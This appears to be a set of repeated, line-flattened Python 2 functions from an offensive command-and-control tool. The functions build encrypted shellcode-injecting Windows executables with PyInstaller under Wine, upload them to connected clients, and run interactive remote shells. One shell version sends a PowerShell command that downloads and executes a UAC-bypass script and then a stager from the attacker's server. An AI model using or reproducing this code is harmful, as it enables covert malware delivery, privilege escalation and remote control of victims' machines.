def GeneratePayload(ez2read_shellcode,payloadname,shellcode): with open('%s/payload.py' % payloaddir(), 'w+') as Filesave: Filesave.write(do_Encryption(SHELLCODE.injectwindows % (ez2read_shellcode))) Filesave.close() print '[*] Creating Payload using Pyinstaller...' randomenckey = ''.join(random.sample(string.ascii_lowercase, 16)) p = subprocess.Popen(['wine', os.path.expanduser('~') + '/.wine/drive_c/Python27/python.exe', '/opt/pyinstaller/pyinstaller.py', '%s/payload.py' % payloaddir(), '--noconsole', '--onefile', '--key',randomenckey], bufsize=1024, stdout=subprocess.PIPE, stderr=subprocess.PIPE) LOADING = Spinner('Generating Payload') while p.poll() == None: LOADING.Update() time.sleep(0.2) print '\r', sys.stdout.flush() payloadstderr = p.stderr.read() if re.search('error', payloadstderr.lower()): print t.bold_red + '[*] Error In Creating Payload... Exiting..\n' + t.normal sys.stdout.write(payloadstderr) raise KeyboardInterrupt os.system('mv dist/payload.exe %s/%s.exe'% (payloaddir(),payloadname)) print t.normal + '\n[*] Payload.exe Has Been Generated And Is Located Here: ' + t.bold_green + '%s/%s.exe' % (payloaddir(), payloadname) + t.normal CleanUpPayloadMess(payloadname) from menu import clientMenuOptions if len(clientMenuOptions.keys()) > 2: DoClientUpload(payloaddir(),payloadname,powershellExec=ez2read_shellcode,isExe=True) else: DoPayloadUpload(payloadname)
def checkUpload(): from menu import clientMenuOptions use_client_upload = prompt_toolkit.prompt( '\n[?] Upload Using Client Connection? [y]/n: ', patch_stdout=True, completer=WordCompleter(['y', 'n'])) print if use_client_upload.lower() == 'y' or use_client_upload == '': clientList = [] for i in clientMenuOptions.keys(): if i == 'back' or i == 'r': pass else: clientList.append(i) print t.bold_yellow + i + t.normal + ': ' + t.bold_green + clientMenuOptions[ i]['payload'] + t.bold_yellow + ' | ' + t.bold_green + clientMenuOptions[ i]['availablemodules'].keys( )[0] + t.bold_yellow + ' | ' + t.bold_green + clientMenuOptions[ i]['availablemodules'].keys()[1] + t.normal print while True: clientchoice = prompt_toolkit.prompt( 'Client > ', patch_stdout=True, style=prompt_toolkit.styles.style_from_dict( {prompt_toolkit.token.Token: '#FFCC66'}), completer=WordCompleter(clientList)) try: return int(clientMenuOptions[clientchoice]['params']) except: continue return False
def GeneratePayload(ez2read_shellcode,payloadname,shellcode): with open('%s/payload.py' % payloaddir(), 'w+') as Filesave: Filesave.write(do_Encryption(SHELLCODE.injectwindows % (ez2read_shellcode))) Filesave.close() print '[*] Creating Payload using Pyinstaller...' randomenckey = ''.join(random.sample(string.ascii_lowercase, 16)) p = subprocess.Popen(['wine', os.path.expanduser('~') + '/.wine/drive_c/Python27/python.exe', '/opt/pyinstaller/pyinstaller.py', '%s/payload.py' % payloaddir(), '--noconsole', '--onefile', '--key',randomenckey], bufsize=1024, stdout=subprocess.PIPE, stderr=subprocess.PIPE) LOADING = Spinner('Generating Payload') while p.poll() == None: LOADING.Update() time.sleep(0.2) print '\r', sys.stdout.flush() payloadstderr = p.stderr.read() if len(sys.argv) > 1: if sys.argv[1] == "-debug": sys.stdout.write(payloadstderr) os.system('mv dist/payload.exe %s/%s.exe'% (payloaddir(),payloadname)) print t.normal + '\n[*] Payload.exe Has Been Generated And Is Located Here: ' + t.bold_green + '%s/%s.exe' % (payloaddir(), payloadname) + t.normal CleanUpPayloadMess(payloadname) from menu import clientMenuOptions if len(clientMenuOptions.keys()) > 2: from stager import clientUpload clientUpload((payloaddir() + '/' + payloadname), powershellExec=ez2read_shellcode, isExe=True, json='{"type":"", "data":"%s", "sendoutput":"false", "multiple":"true"}') else: DoPayloadUpload(payloadname)
def interactShell(clientconn,clientnumber): from menu import clientMenuOptions print "Commands\n" + "-"*24 + "\nback - Background Shell\nexit - Close Connection\n" + "-"*24 while True: command = raw_input("PS > ") if command == "back": break elif command == "" or command == "\n": continue elif command == "exit": if str(clientnumber) in clientMenuOptions.keys(): print t.bold_red + "Client Connection Killed" + t.normal del clientMenuOptions[str(clientnumber)] clientconn.close() break else: clientconn.sendall(command) while True: data = clientconn.recv(1) sys.stdout.write(data) sys.stdout.flush() if data == "\x00": data = '' break return True
def interactShell(clientconn,clientnumber): computerName = "" from menu import clientMenuOptions print "Commands\n" + "-"*24 + "\nback - Background Shell\nexit - Close Connection\n" + "-"*24 while True: while clientconn in select.select([clientconn], [], [], 0.2)[0]: computerName += clientconn.recv(2048) if len(computerName) > 1: print t.bold_yellow + computerName + t.normal command = raw_input("> ") if command == "back": break elif command == "": clientconn.sendall("\n") elif command == "exit": if str(clientnumber) in clientMenuOptions.keys(): print t.bold_red + "Client Connection Killed" + t.normal del clientMenuOptions[str(clientnumber)] clientconn.close() time.sleep(2) break else: clientconn.sendall(command) while True: data = clientconn.recv(1).rstrip('\r') sys.stdout.write(data) sys.stdout.flush() if data == "\x00": break return "clear"
def interactShell(clientconn, clientnumber): computerName = "" from menu import clientMenuOptions print "Commands\n" + "-" * 24 + "\nback - Background Shell\nexit - Close Connection\n" + "-" * 24 while True: while clientconn in select.select([clientconn], [], [], 0.2)[0]: computerName += clientconn.recv(2048) if len(computerName) > 1: print t.bold_yellow + computerName + t.normal command = raw_input("> ") if command == "back": break elif command == "": clientconn.sendall("\n") elif command == "exit": if str(clientnumber) in clientMenuOptions.keys(): print t.bold_red + "Client Connection Killed" + t.normal del clientMenuOptions[str(clientnumber)] clientconn.close() time.sleep(2) break else: clientconn.sendall(command) while True: data = clientconn.recv(1).rstrip('\r') sys.stdout.write(data) sys.stdout.flush() if data == "\x00": break return "clear"
def GeneratePayload(ez2read_shellcode,payloadname,shellcode): with open('%s/payload.py' % payloaddir(), 'w+') as Filesave: Filesave.write(do_Encryption(SHELLCODE.injectwindows % (ez2read_shellcode))) Filesave.close() print '[*] Creating Payload using Pyinstaller...' randomenckey = ''.join(random.sample(string.ascii_lowercase, 16)) p = subprocess.Popen(['wine', '/root/.wine/drive_c/Python27/python.exe', '/opt/pyinstaller/pyinstaller.py', '%s/payload.py' % payloaddir(), '--noconsole', '--onefile', '--key',randomenckey], bufsize=1024, stdout=subprocess.PIPE, stderr=subprocess.PIPE) LOADING = Spinner('Generating Payload') while p.poll() == None: LOADING.Update() time.sleep(0.2) print '\r', sys.stdout.flush() payloadstderr = p.stderr.read() if re.search('error', payloadstderr.lower()): print t.bold_red + '[*] Error In Creating Payload... Exiting..\n' + t.normal sys.stdout.write(payloadstderr) raise KeyboardInterrupt os.system('mv dist/payload.exe %s/%s.exe'% (payloaddir(),payloadname)) print t.normal + '\n[*] Payload.exe Has Been Generated And Is Located Here: ' + t.bold_green + '%s/%s.exe' % (payloaddir(), payloadname) + t.normal CleanUpPayloadMess(payloadname) from menu import clientMenuOptions if len(clientMenuOptions.keys()) > 2: DoClientUpload(payloaddir(),payloadname,powershellExec=ez2read_shellcode,isExe=True) else: DoPayloadUpload(payloadname)
def checkClientUpload(payloadname, powershellExec, isExe): from menu import clientMenuOptions if len(clientMenuOptions.keys()) > 2: DoClientUpload(payloaddir(), payloadname, powershellExec, isExe) return True else: print powershellExec return False
def GeneratePayload(ez2read_shellcode, payloadname, shellcode): randoFileName = ''.join(random.sample(string.ascii_lowercase, 8)) with open('%s/%s.py' % (payloaddir(), randoFileName), 'w+') as Filesave: Filesave.write( do_Encryption(SHELLCODE.injectwindows % (ez2read_shellcode))) Filesave.close() print '[*] Creating Payload using Pyinstaller...' p = subprocess.Popen([ 'wine', os.path.expanduser('~') + '/.win32/drive_c/Python27/python.exe', '/opt/pyinstaller/pyinstaller.py', '%s/%s.py' % (payloaddir(), randoFileName), '--noconsole', '--onefile' ], env=dict( os.environ, **{ 'WINEARCH': 'win32', 'WINEPREFIX': os.path.expanduser('~') + '/.win32' }), bufsize=1024, stdout=subprocess.PIPE, stderr=subprocess.PIPE) LOADING = Spinner('Generating Payload') while p.poll() == None: LOADING.Update() time.sleep(0.2) print '\r', sys.stdout.flush() payloadstderr = p.stderr.read() if len(sys.argv) > 1: if sys.argv[1] == "-debug": sys.stdout.write(payloadstderr) try: os.rename('dist/%s.exe' % randoFileName, '%s/%s.exe' % (payloaddir(), randoFileName)) except OSError: print t.bold_red + "[!] Error while creating payload..." + t.normal print payloadstderr return False print t.normal + '\n[*] Payload.exe Has Been Generated And Is Located Here: ' + t.bold_green + '%s/%s.exe' % ( payloaddir(), randoFileName) + t.normal CleanUpPayloadMess(randoFileName) from menu import clientMenuOptions if len(clientMenuOptions.keys()) > 2: from stager import clientUpload clientUpload( (payloaddir() + '/' + randoFileName), powershellExec=ez2read_shellcode, isExe=True, json= '{"type":"", "data":"%s", "sendoutput":"false", "multiple":"true"}' ) else: DoPayloadUpload(randoFileName) return True
def pingClients(clientconn,clientnumber): from menu import clientMenuOptions try: while True: time.sleep(15) clientconn.recv(1) except: if str(clientnumber) in clientMenuOptions.keys(): print t.bold_red + "Client %s Has Disconnected" % clientnumber + t.normal del clientMenuOptions[str(clientnumber)] sys.exit(1)
def checkUpload(): from menu import clientMenuOptions use_client_upload = raw_input('[?] Upload Using Client Connection? [y]/n: ') if use_client_upload.lower() == 'y' or use_client_upload == '': for i in clientMenuOptions.keys(): if i == 'back' or i == 'r': pass else: print t.bold_yellow + i + t.normal + ': ' + t.bold_green + clientMenuOptions[i]['payload'] + t.normal + '\n' while True: clientchoice = raw_input('>> ') try: return int(clientMenuOptions[clientchoice]['params']) except: continue return False
def DoClientUpload(payloaddir,payloadname,powershellExec,isExe): use_client_upload = raw_input( '\n[*] Upload Using Client Connection? [y]/n: ') if use_client_upload.lower() == 'y' or use_client_upload == '': from menu import clientMenuOptions for i in clientMenuOptions.keys(): if i == 'back' or i == 'r': pass else: print t.bold_yellow + i +t.normal + ': ' + t.bold_green + clientMenuOptions[i]['payload'] + t.normal + '\n' while True: clientchoice = raw_input('>> ') try: clientnumber = clientMenuOptions[clientchoice]['params'] break except: continue clientUpload((payloaddir + '/' + payloadname),clientnumber,powershellExec,isExe) print "Allow 20 seconds for payload connection..."
def DoClientUpload(payloaddir,payloadname,powershellExec,isExe): use_client_upload = raw_input( '\n[*] Upload Using Client Connection? [y]/n: ') if use_client_upload.lower() == 'y' or use_client_upload == '': from menu import clientMenuOptions for i in clientMenuOptions.keys(): if i == 'back' or i == 'r': pass else: print t.bold_yellow + i +t.normal + ': ' + t.bold_green + clientMenuOptions[i]['payload'] + t.normal + '\n' while True: clientchoice = raw_input('>> ') try: clientconn, clientnumber = clientMenuOptions[clientchoice]['params'] break except: continue clientUpload((payloaddir + '/' + payloadname),clientconn,powershellExec,isExe)
def interactShell(clientconn, clientnumber): computerName = "" from menu import clientMenuOptions print "Commands\n" + "-" * 50 + "\nback - Background Shell\nexit - Close Connection\nuacbypass - UacBypass To Open New Admin Connection\n" + "-" * 50 while True: while clientconn in select.select([clientconn], [], [], 0.1)[0]: computerName += clientconn.recv(2048) if len(computerName) > 1: print t.bold_yellow + computerName + t.normal command = raw_input(" ") if command.lower() == "back": break elif command.lower() == "uacbypass": clientconn.sendall( "IEX (New-Object Net.WebClient).DownloadString(\"https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-EventVwrBypass.ps1\");Invoke-EventVwrBypass -Command \"powershell.exe -c IEX (New-Object Net.Webclient).DownloadString('http://" + FUNCTIONS().CheckInternet() + ":" + str(randoStagerDLPort) + "/" + "p.ps1" + "')\"") elif command == "": clientconn.sendall("\n") elif command.lower() == "exit": if str(clientnumber) in clientMenuOptions.keys(): print t.bold_red + "Client %s Connection Killed" % clientnumber + t.normal del clientMenuOptions[str(clientnumber)] clientconn.close() time.sleep(2) break else: clientconn.sendall(command) while True: data = clientconn.recv(1).rstrip('\r') sys.stdout.write(data) sys.stdout.flush() if data == "\x00": break return "clear"
def interactShell(clientconn,clientnumber): from menu import clientMenuOptions print "Commands\n" + "-"*24 + "\nback - Background Shell\nexit - Close Connection\n" + "-"*24 while True: data = '' command = raw_input("PS >") if command == "back": break if command == "exit": if str(clientnumber) in clientMenuOptions.keys(): print t.bold_red + "Client Connection Killed" + t.normal del clientMenuOptions[str(clientnumber)] clientconn.close() break if command == "": continue clientconn.sendall(command) while True: data = clientconn.recv(1) sys.stdout.write(data) sys.stdout.flush() if data == "\x00": break return True
def checkClientUpload(payloadname, powershellExec, isExe): from menu import clientMenuOptions if len(clientMenuOptions.keys()) > 2: DoClientUpload(payloaddir(),payloadname,powershellExec,isExe) else: print powershellExec